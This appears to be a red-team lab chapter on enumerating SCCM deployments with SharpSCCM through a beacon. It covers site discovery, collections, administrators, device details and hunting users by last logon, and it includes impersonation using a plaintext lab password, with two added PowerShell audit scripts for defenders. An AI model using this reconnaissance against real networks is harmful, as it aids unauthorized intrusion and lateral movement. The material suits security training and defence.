The first step when attacking SCCM is to get a feel for the deployment topology, which devices are being managed, and who the administrative users are. Throughout this chapter, we'll use the SharpSCCM tool. Given a foothold on a machine, we can begin by finding the management point and site code that it is linked to. This does not require any special privileges in the domain, in SCCM or on the endpoint.
```
beacon> run hostname
wkstn-2

beacon> getuid
[*] You are DEV\bfarmer

beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe local site-info --no-banner
-----------------------------------
CurrentManagementPoint: scm-1.cyberbotic.io
Name: SMS:S01
-----------------------------------
[+] Completed execution in 00:00:00.2733939
```
This enumeration uses WMI under the hood, which could be done manually.
We can also check the DACL on the CN=System Management container in AD for machines that have Full Control over it (as this is a prerequisite of SCCM setup in a domain).

```
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get site-info -d cyberbotic.io --no-banner
[!] Found 1 computer account(s) with GenericAll permission on the System Management container:
CYBER\SCM-1$
[+] These systems are likely to be ConfigMgr site servers
[+] Completed execution in 00:00:00.4974129
```
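The two queries that `site-info` wraps, as an added PowerShell example (not SharpSCCM's own code) that a defender can use to verify a client's site binding and to audit who holds Full Control on the container. It assumes it runs on a managed client with the ConfigMgr agent installed, that the ActiveDirectory module is available for the `AD:` drive, and it uses the cyberbotic.io domain from the page.

```powershell
# Added example (not SharpSCCM code): the WMI and AD queries behind "local site-info"
# and "get site-info -d". Assumptions: ConfigMgr agent present on this host; the
# ActiveDirectory module is installed; domain DN derived from cyberbotic.io.

# 1. Which site code and management point is this client bound to?
#    The agent stores this in the SMS_Authority class of the root\ccm namespace.
$auth = Get-CimInstance -Namespace 'root\ccm' -ClassName SMS_Authority
$siteInfo = [pscustomobject]@{
    SiteCode        = $auth.Name -replace '^SMS:', ''   # "SMS:S01" -> "S01"
    ManagementPoint = $auth.CurrentManagementPoint      # e.g. scm-1.cyberbotic.io
}
$siteInfo | Format-List

# 2. Which principals hold Full Control (GenericAll) on CN=System Management?
#    Site servers need this right to publish to AD, so any entry that is not a
#    site server computer account deserves a review.
Import-Module ActiveDirectory
$container = 'AD:\CN=System Management,CN=System,DC=cyberbotic,DC=io'
$fullControl = (Get-Acl -Path $container).Access |
    Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        "$($_.ActiveDirectoryRights)" -match 'GenericAll'
    } |
    Select-Object IdentityReference, IsInherited

if ($fullControl) {
    Write-Host "Principals with Full Control on the System Management container:"
    $fullControl | Format-Table -AutoSize
} else {
    Write-Host "No explicit GenericAll grants found on the System Management container."
}
```

On a host without the agent the first query returns nothing, which is itself useful: the machine is not managed by SCCM from that site.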
Enumerating users, groups, computers, collections, administrators and so on does require some level of privilege in SCCM and cannot be done as a standard domain user. SCCM employs an RBAC security model: the lowest role is "Read-Only Analyst" and the highest is "Full Administrator". Many other roles exist, such as "Asset Manager", "Infrastructure Administrator", and "Software Update Manager". A description of each can be found here. Furthermore, the "scope" of these roles can be restricted to individual collections as needed by the administrative user. For example, computers from the DEV and CYBER domains have been grouped into their own collections.
This can really impact your view (as an attacker) of how SCCM is configured. For example, if we enumerate all the collections as bfarmer, we can see that both DEV and CYBER exist as well as their member counts.
```
beacon> getuid
[*] You are DEV\bfarmer

beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get collections --no-banner
-----------------------------------
Name: DEV
MemberCount: 6
-----------------------------------
Name: CYBER
MemberCount: 4
-----------------------------------
[+] Completed execution in 00:00:00.6623964
```
However, if we run the same enumeration as jking, a member of DEV\Support Engineers, we only see the DEV collection.
```
beacon> make_token DEV\jking Qwerty123
[+] Impersonated DEV\jking (netonly)

beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get collections --no-banner
-----------------------------------
Name: DEV
MemberCount: 6
-----------------------------------
[+] Completed execution in 00:00:02.7849452
```
This is because even though DEV\Developers are only "Read-Only Analysts", the role is scoped to both collections. DEV\Support Engineers are "Full Administrators" over the DEV collection but they have no roles that are scoped to the CYBER collection.
So when enumerating SCCM, you may only see a small sliver of the deployment, depending on the user you're running the enumeration as.

Administrative users can be found using `get class-instances SMS_Admin`.
```
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get class-instances SMS_Admin --no-banner
-----------------------------------
CategoryNames: All
CollectionNames: All Systems, All Users and User Groups
LogonName: SCM-1\Administrator
RoleNames: Full Administrator
-----------------------------------
CategoryNames: Default
CollectionNames: DEV, CYBER
LogonName: DEV\Developers
RoleNames: Read-only Analyst
-----------------------------------
CategoryNames: Default
CollectionNames: DEV
LogonName: DEV\Support Engineers
RoleNames: Full Administrator
-----------------------------------
CategoryNames: All
CollectionNames: All Systems, All Users and User Groups
LogonName: CYBER\Domain Admins
RoleNames: Full Administrator
-----------------------------------
[+] Completed execution in 00:00:06.0664364
```
This allows us to see what is reflected in the Configuration Manager GUI above. Members of these collections can be found using `get collection-members -n <collection-name>`.
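The same SMS_Admin data, read from the SMS Provider and turned into a role-scope review, as an added PowerShell example for administrators (not SharpSCCM's or the product's own code). It covers both the RBAC scoping discussed above and the SMS_Admin listing, and assumes the SMS Provider runs on the site server scm-1.cyberbotic.io with site code S01 (both from the page) and that the caller already holds an SCCM role that can read SMS_Admin.

```powershell
# Added example (not SharpSCCM code): review SCCM RBAC assignments for over-broad
# scope. Assumptions: SMS Provider on scm-1.cyberbotic.io (the site server), site
# code S01, and the caller has rights to read SMS_Admin.
param(
    [string]$SiteCode     = 'S01',
    [string]$ProviderHost = 'scm-1.cyberbotic.io'
)
$ns      = "root\SMS\site_$SiteCode"
$session = New-CimSession -ComputerName $ProviderHost

# RoleNames, CollectionNames and CategoryNames are lazy properties of SMS_Admin:
# the enumeration query leaves them empty, so each instance is fetched in full.
$admins = Get-CimInstance -CimSession $session -Namespace $ns -ClassName SMS_Admin |
          ForEach-Object { Get-CimInstance -CimSession $session -InputObject $_ }

$report = foreach ($a in $admins) {
    $roles = @($a.RoleNames)
    $cols  = @($a.CollectionNames)
    $isFullAdmin = $roles -contains 'Full Administrator'
    # "All Systems" is the built-in collection that contains every managed device,
    # so a Full Administrator scoped to it can act on the whole hierarchy.
    $isSiteWide  = $cols -contains 'All Systems'

    $finding = if ($isFullAdmin -and $isSiteWide) {
                   'REVIEW: site-wide Full Administrator'
               } elseif ($isFullAdmin) {
                   'Full Administrator limited to: ' + ($cols -join ', ')
               } else { '' }

    [pscustomobject]@{
        LogonName   = $a.LogonName
        Roles       = $roles -join ', '
        Collections = $cols -join ', '
        Finding     = $finding
    }
}

# Site-wide Full Administrators first, so the entries that matter most are on top.
$report | Sort-Object { $_.Finding -notlike 'REVIEW*' }, LogonName | Format-Table -AutoSize
Remove-CimSession $session
```

Against the page's data this lists SCM-1\Administrator and CYBER\Domain Admins as site-wide Full Administrators, DEV\Support Engineers as a Full Administrator limited to DEV, and DEV\Developers with no finding.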
```
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get collection-members -n DEV --no-banner
-----------------------------------
Domain: DEV
Name: WKSTN-2
-----------------------------------
Domain: DEV
Name: SQL-2
-----------------------------------
Domain: DEV
Name: WKSTN-1
-----------------------------------
Domain: DEV
Name: DC-2
-----------------------------------
Domain: DEV
Name: FS
-----------------------------------
Domain: DEV
Name: WEB
-----------------------------------
[+] Completed execution in 00:00:03.2562318
```
Even more information on each device can be obtained using `get devices`. There are some good ways to filter the output, such as searching by device name with `-n`, and only displaying the properties specified with `-p`.
```
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get devices -n WKSTN -p Name -p FullDomainName -p IPAddresses -p LastLogonUserName -p OperatingSystemNameandVersion --no-banner
-----------------------------------
FullDomainName: DEV.CYBERBOTIC.IO
IPAddresses: 10.10.123.101
LastLogonUserName: nlamb
Name: WKSTN-1
OperatingSystemNameandVersion: Microsoft Windows NT Workstation 10.0
-----------------------------------
FullDomainName: DEV.CYBERBOTIC.IO
IPAddresses: 10.10.123.102
LastLogonUserName: bfarmer
Name: WKSTN-2
OperatingSystemNameandVersion: Microsoft Windows NT Workstation 10.0
-----------------------------------
[+] Completed execution in 00:00:01.3059878
```
You can also use SCCM as a form of user hunting, since it records the last user to log in to each managed computer. The `-u` parameter will only return devices where the given user was the last to log in.
```
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get devices -u nlamb -p IPAddresses -p IPSubnets -p Name --no-banner
-----------------------------------
IPAddresses: 10.10.123.101
IPSubnets: 10.10.122.0
Name: WKSTN-1
-----------------------------------
[+] Completed execution in 00:00:01.7570393
```
However, take these results with a grain of salt, because this information is only updated in SCCM every 7 days by default, so the recorded last-logon user may be stale.